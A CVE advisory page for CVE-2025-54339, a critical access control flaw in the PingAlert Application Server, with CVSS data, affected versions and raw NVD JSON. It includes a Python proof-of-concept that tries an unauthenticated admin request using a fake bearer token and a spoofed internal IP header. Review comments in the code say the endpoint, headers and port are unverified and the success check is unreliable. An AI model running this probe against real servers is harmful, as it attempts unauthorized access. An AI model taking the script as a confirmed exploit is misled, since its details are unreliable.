Security Vulnerability Report
CVE-2025-54339 CVSS 10.0 CRITICAL

CVE-2025-54339

Published: 2025-11-14 18:15:48
Last Modified: 2025-11-19 21:30:21

Description

An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 exploitable remotely for Escalation of Privileges.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE (the raw CPE match data below gives versionStartIncluding 6.1.0.11 and versionEndExcluding 6.1.1.4, which is wider than the list of builds that follows)
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.0.12
Desktop Alert PingAlert 6.1.0.13
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import struct  # NOTE(review): imported but never used in this script

# CVE-2025-54339 PoC - Desktop Alert PingAlert Access Control Bypass
# Target: Desktop Alert PingAlert Application Server
# Vulnerability: Incorrect Access Control in Application Server
#
# NOTE(review): the advisory text on this page only states "Incorrect Access
# Control" in the Application Server (CWE-284). The request path, header values
# and default port used below are not given there, so this script should be
# read as an illustrative probe, not as a verified reproduction of the issue.


def exploit_pingalert(target_ip: str, target_port: int = 8080) -> bool:
    """
    Exploit for CVE-2025-54339

    This PoC demonstrates the access control bypass vulnerability
    in Desktop Alert PingAlert Application Server.

    WARNING: Only use for authorized security testing

    Sends a single unauthenticated HTTP/1.1 GET over a plain IPv4 TCP socket
    and inspects the first 4096 bytes of whatever comes back.

    Args:
        target_ip: Host to connect to; it is encoded verbatim into the Host
            header and passed straight to ``socket.connect``.
        target_port: TCP port to connect to. The default of 8080 is not
            stated in the advisory on this page -- confirm it against the
            deployment before drawing conclusions from a refused connection.

    Returns:
        True if the reply contains ``200 OK`` or ``application/json``,
        False otherwise and on any exception (errors are printed, not
        raised), so a False result cannot distinguish "patched" from
        "unreachable".
    """
    # Craft malicious HTTP request to bypass access control
    # The server does not properly validate authentication tokens
    # NOTE(review): the statement about token validation is the PoC author's,
    # not the advisory's; nothing on this page describes how tokens are checked.
    payload = b"GET /admin/api/system/config HTTP/1.1\r\n"
    payload += b"Host: " + target_ip.encode() + b":" + str(target_port).encode() + b"\r\n"
    payload += b"User-Agent: Mozilla/5.0\r\n"
    payload += b"Accept: */*\r\n"
    payload += b"Authorization: Bearer anonymous\r\n"  # Bypass token
    payload += b"X-Forwarded-For: 127.0.0.1\r\n"  # Spoof internal IP
    # NOTE(review): both values above are fixed literals. Whether the server
    # honours either of them is not established anywhere on this page. From a
    # monitoring standpoint the same fixed strings make this request easy to
    # recognise in access logs.
    payload += b"Connection: close\r\n\r\n"

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 only
        sock.settimeout(10)  # covers connect(), send() and recv() below
        sock.connect((target_ip, target_port))  # plain TCP; no TLS is negotiated
        sock.send(payload)  # NOTE(review): send() does not guarantee the whole payload is written
        response = sock.recv(4096)  # first chunk only; headers/body may be truncated
        sock.close()  # NOTE(review): not reached if recv() raises; the socket is then left to the GC

        print(f"[+] Request sent to {target_ip}:{target_port}")
        print(f"[+] Response received: {len(response)} bytes")

        # Check if access was granted without proper authentication
        # NOTE(review): this is a weak oracle. Any 200 reply (a login page, a
        # redirect landing page, a JSON-encoded error) satisfies it, and so does
        # a non-200 reply whose first 4096 bytes happen to contain either
        # substring. A True result here is not evidence of the vulnerability.
        if b"200 OK" in response or b"application/json" in response:
            print("[!] VULNERABLE: Access control bypass successful")
            print("[!] Server returned sensitive data without authentication")
            return True
        else:
            print("[-] Target may not be vulnerable or patched")
            return False

    except Exception as e:
        # Connection refused, timeouts, DNS failures and the .encode()/connect
        # errors all land here and are reported as False, which a caller that
        # only reads the return value cannot tell apart from "not vulnerable".
        print(f"[-] Error: {str(e)}")
        return False


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_54339_poc.py <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    # int() raises ValueError on a non-numeric port; nothing here catches it.
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    exploit_pingalert(target, port)  # return value is discarded; exit status is always 0 on this path

References

Vendor advisory: https://desktopalert.net/cve-2025-54339/
Product page: https://desktopalert.net

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54339", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:48.050", "lastModified": "2025-11-19T21:30:20.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 exploitable remotely for Escalation of Privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.4", "matchCriteriaId": "3CE54623-DECB-4213-B299-40AAE561D3E2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54339/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}